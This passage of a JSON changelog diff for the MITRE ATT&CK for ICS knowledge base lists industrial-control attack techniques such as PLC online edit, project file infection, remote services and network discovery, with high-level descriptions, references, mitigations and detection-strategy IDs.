+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0945: Code Signing",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0913: Detection of Program Download All"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d85a6ee9-820c-4adf-8a64-2392ee70c83c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:25.372000+00:00",
+                    "modified": "2026-05-12 15:12:00.721000+00:00",
+                    "name": "Online Edit",
+                    "description": "Adversaries may execute an online edit of a PLC to update parts of an existing program. It does not require stopping the PLC which allows it to continue running during transfer and reconfiguration without interruption to process control. Adversaries may leverage this approach to minimize downtime and evade detection. \n\nThe ability to perform an online edit to the PLC typically relies on access to a workstation with the vendor-specific PLC programming software installed.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0843/002",
+                            "external_id": "T0843.002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.721000+00:00\", \"old_value\": \"2026-04-23 17:40:18.368000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0945: Code Signing",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0915: Detection of Online Edit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--574d5bfb-9a7a-4b28-ab5c-743ac704c135",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:25.997000+00:00",
+                    "modified": "2026-05-12 15:12:00.634000+00:00",
+                    "name": "Program Append",
+                    "description": "Adversaries may execute a program append to a PLC to update parts of an existing program. It may or may not require stopping the PLC which may allow it to continue running during transfer and reconfiguration without interruption to process control. Adversaries may leverage this approach to minimize downtime and evade detection. \n\nThe ability to perform a program append to the PLC typically relies on access to a workstation with the vendor-specific PLC programming software installed.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0843/003",
+                            "external_id": "T0843.003"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.634000+00:00\", \"old_value\": \"2026-04-23 00:18:49.737000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0802: Communication Authenticity",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic",
+                            "M0945: Code Signing",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0914: Detection of Program Append"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Project File Infection",
+                    "description": "Adversaries may attempt to infect project files with malicious code. These project files may consist of objects, program organization units, variables such as tags, documentation, and other configurations needed for PLC programs to function.(Citation: Beckhoff) Using built in functions of the engineering software, adversaries may be able to download an infected program to a PLC in the operating environment enabling further [Execution](https://attack.mitre.org/tactics/TA0104) and [Persistence](https://attack.mitre.org/tactics/TA0110) techniques.(Citation: PLCdev) \n\nAdversaries may export their own code into project files with conditions to execute at specific intervals.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) Malicious programs allow adversaries control of all aspects of the process enabled by the PLC. Once the project file is downloaded to a PLC the workstation device may be disconnected with the infected project file still executing.(Citation: PLCdev)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0873",
+                            "external_id": "T0873"
+                        },
+                        {
+                            "source_name": "Beckhoff",
+                            "description": "Beckhoff   TwinCAT 3 Source Control: Project Files Retrieved. 2019/11/21 ",
+                            "url": "https://infosys.beckhoff.com/english.php?content=../content/1033/tc3_sourcecontrol/18014398915785483.html&id="
+                        },
+                        {
+                            "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
+                            "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024.",
+                            "url": "https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en"
+                        },
+                        {
+                            "source_name": "PLCdev",
+                            "description": "PLCdev Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22  Siemens SIMATIC Step 7 Programmer's Handbook Retrieved. 2019/11/21 ",
+                            "url": "http://www.plcdev.com/book/export/html/373"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.723000+00:00\", \"old_value\": \"2026-04-23 19:35:14.939000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0922: Restrict File and Directory Permissions",
+                            "M0941: Encrypt Sensitive Information",
+                            "M0945: Code Signing",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0766: Detection of Project File Infection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--354ca909-b54d-4c41-b597-9c296b344a43",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:20.103000+00:00",
+                    "modified": "2026-05-12 15:12:00.625000+00:00",
+                    "name": "Siemens Project File Format",
+                    "description": "Adversaries may infect Siemens PLC project files (i.e., Step 7, WinCC, etc.) to achieve [Execution](https://attack.mitre.org/tactics/TA0104), [Persistence](https://attack.mitre.org/tactics/TA0110), and [Lateral Movement](https://attack.mitre.org/tactics/TA0109) objectives. Adversaries may modify an existing project file or bring their own project files into the environment.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)\n\nThe ability for an adversary to deploy an infected project file relies on access to a workstation with Siemens PLC programming software installed on it from which a program download can be performed.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0873/001",
+                            "external_id": "T0873.001"
+                        },
+                        {
+                            "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
+                            "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024.",
+                            "url": "https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.625000+00:00\", \"old_value\": \"2026-04-23 19:37:43.545000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0922: Restrict File and Directory Permissions",
+                            "M0941: Encrypt Sensitive Information",
+                            "M0945: Code Signing",
+                            "M0947: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0906: Detection of Siemens Project File Format Infection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-04-12 19:26:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.722000+00:00",
+                    "name": "Remote Services",
+                    "description": "Adversaries may leverage remote services to move between assets and network segments. These services are often used to allow operators to interact with systems remotely within the network, some examples are RDP, SMB, SSH, and other similar mechanisms. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: Joe Slowik April 2019) \n\nRemote services could be used to support remote access, data transmission, authentication, name resolution, and other remote functions. Further, remote services may be necessary to allow operators and administrators to configure systems within the network from their engineering or management workstations. An adversary may use this technique to access devices which may be dual-homed (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) to multiple network segments, and can be used for [Program Download](https://attack.mitre.org/techniques/T0843) or to execute attacks on control devices directly through [Valid Accounts](https://attack.mitre.org/techniques/T0859).\n\nSpecific remote services (RDP & VNC) may be a precursor to enable [Graphical User Interface](https://attack.mitre.org/techniques/T0823) execution on devices such as HMIs or engineering workstation software.\n\nBased on incident data, CISA and FBI assessed that Chinese state-sponsored actors also compromised various authorized remote access channels, including systems designed to transfer data and/or allow access between corporate and ICS networks.  (Citation: CISA AA21-201A Pipeline Intrusion July 2021)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "initial-access"
+                        },
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0886",
+                            "external_id": "T0886"
+                        },
+                        {
+                            "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017",
+                            "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ",
+                            "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html"
+                        },
+                        {
+                            "source_name": "CISA AA21-201A Pipeline Intrusion July 2021",
+                            "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ",
+                            "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf"
+                        },
+                        {
+                            "source_name": "Dragos December 2017",
+                            "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ",
+                            "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf"
+                        },
+                        {
+                            "source_name": "Joe Slowik April 2019",
+                            "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ",
+                            "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Daisuke Suzuki"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.722000+00:00\", \"old_value\": \"2025-04-16 21:26:19.525000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0800: Authorization Enforcement",
+                            "M0801: Access Management",
+                            "M0804: Human User Authentication",
+                            "M0807: Network Allowlists",
+                            "M0813: Software Process and Device Authentication",
+                            "M0918: User Account Management",
+                            "M0927: Password Policies",
+                            "M0930: Network Segmentation",
+                            "M0937: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0804: Detection of Remote Services"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-05-21 17:43:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.718000+00:00",
+                    "name": "Remote System Discovery",
+                    "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for subsequent Lateral Movement or Discovery techniques. Functionality could exist within adversary tools to enable this, but utilities available on the operating system or vendor software could also be used.(Citation: Enterprise ATT&CK January 2018)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0846",
+                            "external_id": "T0846"
+                        },
+                        {
+                            "source_name": "Enterprise ATT&CK January 2018",
+                            "description": "Enterprise ATT&CK 2018, January 11 Remote System Discovery Retrieved. 2018/05/17 ",
+                            "url": "https://attack.mitre.org/wiki/Technique/T1018"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.718000+00:00\", \"old_value\": \"2026-04-23 19:39:03.420000+00:00\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0814: Static Network Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0739: Detection of Remote System Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c55f0be5-044e-4577-8095-65b37680d28c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:21.227000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Broadcast Discovery",
+                    "description": "Adversaries may perform broadcast discovery requests to enumerate systems and devices on a network. Broadcast discovery works by one system or device sending messages to all systems and devices on a network (or subnet) and then waiting for a response. If a response is received that means the system or device that responded is live and can communicate over that protocol. Adversaries may leverage different protocols supported on the network for sending broadcast messages. \n\nSome common OT protocols that have broadcast discovery mechanisms are Building Automation and Control Network (BACNet) Who-Is requests, Common Industrial Protocol (CIP) List Identity User Datagram Protocol (UDP) broadcast requests, and Siemens S7 broadcast identification requests.(Citation: Broadcasting BACnet)(Citation: Cisco Active Discovery)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0846/002",
+                            "external_id": "T0846.002"
+                        },
+                        {
+                            "source_name": "Cisco Active Discovery",
+                            "description": "Cisco Systems, Inc.. (2024, March 5). Cisco Cyber Vision Active Discovery Configuration Guide, Release 4.3.0. Retrieved April 23, 2026.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/security/cyber_vision/publications/Active-Discovery/Release-4-3-0/b_Cisco_Cyber_Vision_Active_Discovery_Configuration_Guide.pdf"
+                        },
+                        {
+                            "source_name": "Broadcasting BACnet",
+                            "description": "H. Michael Newman. (2010, November). Broadcasting BACnet\u00ae. Retrieved April 23, 2026.",
+                            "url": "https://bacnet.org/wp-content/uploads/sites/4/2022/06/Newman_2010.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2026-04-23 19:43:10.464000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0814: Static Network Configuration",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0908: Detection of Broadcast Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--64bbc1b2-101f-4322-af1d-0c9cc25cef91",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:21.726000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Multicast Discovery",
+                    "description": "Adversaries may perform multicast discovery requests which is when one system or device sends messages to all systems and devices in a pre-defined group on a network (or subnet) and then waits for a response. If a response is received that means the system or device that responded is live and can communicate over that protocol.  Multicast discovery tends to be stealthier than broadcast discovery because every system or device on the network (or subnet) is not being messaged. \n\nOne common OT protocol that has a multicast discovery mechanism is the Process Field Network (PROFINET) Discovery and Configuration Protocol (DCP) with its Identify All requests.(Citation: Cisco Active Discovery)\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0846/003",
+                            "external_id": "T0846.003"
+                        },
+                        {
+                            "source_name": "Cisco Active Discovery",
+                            "description": "Cisco Systems, Inc.. (2024, March 5). Cisco Cyber Vision Active Discovery Configuration Guide, Release 4.3.0. Retrieved April 23, 2026.",
+                            "url": "https://www.cisco.com/c/en/us/td/docs/security/cyber_vision/publications/Active-Discovery/Release-4-3-0/b_Cisco_Cyber_Vision_Active_Discovery_Configuration_Guide.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2026-04-23 19:45:38.166000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0814: Static Network Configuration",
+                            "M0930: Network Segmentation"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0909: Detection of Multicast Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--5d24bb1d-4487-4923-ae3a-8e679092ac7a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-20 20:54:20.714000+00:00",
+                    "modified": "2026-05-12 15:12:00.635000+00:00",
+                    "name": "Port Scan",
+                    "description": "Adversaries may perform a port scan on a system, device, or network to identify live hosts, enumerate open ports and running services, identify operating systems, and map out the network.(Citation: NIST SP 800-82r3) The results of a port scan may inform adversary [Discovery](https://attack.mitre.org/tactics/TA0102), [Lateral Movement](https://attack.mitre.org/tactics/TA0109), and vulnerability exploitation decisions ([Exploitation for Evasion](https://attack.mitre.org/techniques/T0820), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T0890), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T0866)). \n\nSome common tools for executing a port scan include `nmap`, `netcat`, and the Advanced Port Scanner.\n",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0846/001",
+                            "external_id": "T0846.001"
+                        },
+                        {
+                            "source_name": "NIST SP 800-82r3",
+                            "description": "Keith Stouffer. (2023, September). Guide to Operational Technology  (OT) Security. Retrieved April 22, 2026.",
+                            "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.635000+00:00\", \"old_value\": \"2026-04-23 19:41:07.822000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0814: Static Network Configuration",
+                            "M0930: Network Segmentation",
+                            "M0931: Network Intrusion Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0907: Detection of Port Scan"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-04-13 12:45:26.506000+00:00",
+                    "modified": "2026-05-12 15:12:00.624000+00:00",
+                    "name": "Remote System Information Discovery",
+                    "description": "An adversary may attempt to get detailed information about remote systems and their peripherals, such as make/model, role, and configuration. Adversaries may use information from Remote System Information Discovery to aid in targeting and shaping follow-on behaviors. For example, the system's operational role and model information can dictate whether it is a relevant target for the adversary's operational objectives. In addition, the system's configuration may be used to scope subsequent technique usage. \n\nRequests for system information are typically implemented using automation and management protocols and are often automatically requested by vendor software during normal operation. This information may be used to tailor management actions, such as program download and system or module firmware. An adversary may leverage this same information by issuing calls directly to the system's API.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-ics-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T0888",
+                            "external_id": "T0888"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "None"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.624000+00:00\", \"old_value\": \"2025-04-16 21:26:12.694000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M0814: Static Network Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
